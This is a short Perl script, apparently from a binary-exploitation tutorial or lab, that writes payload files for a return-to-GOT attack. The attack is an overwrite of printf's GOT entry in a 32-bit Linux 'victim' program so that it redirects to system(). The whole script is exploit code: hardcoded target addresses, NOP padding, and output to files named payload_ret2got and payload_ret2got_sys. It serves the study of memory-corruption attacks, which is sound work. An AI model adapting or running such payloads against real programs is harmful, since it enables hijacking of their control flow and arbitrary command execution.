#!/usr/bin/perl

# This address must match the address of system's dynamic linker call
my $sysaddr = "\x46\x83\x04\x08";  #0x08048346

# This address must match the address of printf's GOT entry
my $printfaddr = "\x0c\xa0\x04\x08";  #0x0804a00c

# Fill NOP instruction
my $pad = "\x90" x 8;

# Input string to our victim's program
my $arg = $pad.$printfaddr;

# Let us store the input string to a file
open OUT, "> payload_ret2got";
print OUT $arg;
close OUT;
open OUT, "> payload_ret2got_sys";
print OUT $sysaddr;
close OUT;